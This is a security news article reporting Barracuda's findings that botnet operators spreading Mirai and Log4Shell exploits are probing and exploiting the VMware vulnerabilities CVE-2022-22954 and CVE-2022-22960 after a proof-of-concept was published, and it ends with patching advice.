Researchers report that hackers are using a GitHub proof-of-concept exploit of recently disclosed VMware vulnerabilities in the wild.
Recent VMware vulnerabilities are being exploited by hackers intent on delivering the Mirai denial-of-service malware and exploiting the Log4Shell vulnerability.
Barracuda security researchers discovered attempts to exploit the recently disclosed vulnerabilities CVE-2022-22954 and CVE-2022-22960, both of which were disclosed last month.
Researchers at Barracuda analyzed the attacks and payloads detected by Barracuda systems between April and May and discovered a steady stream of attempts to exploit two recently discovered VMware vulnerabilities: CVE-2022-22954 and CVE-2022-22960.
VMware published an advisory detailing multiple security vulnerabilities on April 6, 2022. The most severe of these vulnerabilities is CVE-2022-22954, which has a CVSS score of 9.8. This vulnerability allows an attacker with network access to remotely execute code via server-side template injection on VMware Workspace ONE Access and Identity Manager Solutions.
CVE-2022-22960 (CVSS score: 7.8) is a local privilege escalation flaw in VMware Workspace ONE Access, Identity Manager, and vRealize Automation. According to VMware’s advisory, the flaw is caused by incorrect permissions in support scripts, which allows an attacker with local access to gain root privileges.
VMware Workspace One is an intelligently-driven workspace platform that simplifies and secures the management of any app on any device. vRealize Automation is a DevOps-based infrastructure management platform for configuring IT resources and automating the delivery of containerized applications. The Identity manager handles authentication to the platform.
Exploitation Occurred Following PoC Publication
The Barracuda researchers observed that the preceding vulnerabilities form a potential vector for complete exploitation.
In April, after VMware disclosed the vulnerability, a proof-of-concept (PoC) was published on GitHub and shared on Twitter.
“Shortly after the release of the advisory and the initial release of the proof of concept on GitHub, Barracuda researchers began observing probes and exploit attempts for this vulnerability,” the company reported.
After the release of the proof-of-concept, the researcher observes an increase in attempts, which they classify as a probe rather than actual attempts to exploit.
“The attacks have been consistent over time, except a few spikes, and the vast majority are classified as probes as opposed to actual exploit attempts,” they explained.
Barracuda researchers also discovered that the majority of exploit attempts originate from botnet operators, with the IPs discovered hosting variants of the Mirai distributed-denial-of-service (DDoS) botnet malware, Log4Shell exploits, and low levels of EnemyBot (a DDoS botnet) attempts.
The majority of attacks (76 percent) originated in the United States, with the majority coming from data centers and cloud service providers. The researcher added that there is an increase in IP addresses from the United Kingdom and Russia and that approximately six percent of the attacks originate from these regions.
“There are also consistent background attempts from known bad IPs in Russia,” the researchers noted.
Researchers explained, “Some of these IPs perform periodic scans for specific vulnerabilities, and it appears that the VMware vulnerabilities have been added to their usual rotating list of Laravel/Drupal/PHP probes.”
According to Barracuda, “interest levels on these vulnerabilities have stabilized” since the initial spike in April, and the researcher expects to continue analyzing low-level scanning and attempts for a while.
Barracuda recommends applying patches immediately, especially if the system is internet-facing, and placing a Web application firewall (WAF) in front of such systems “will add to defense in depth against zero-day attacks and other vulnerabilities, including Log4Shell.”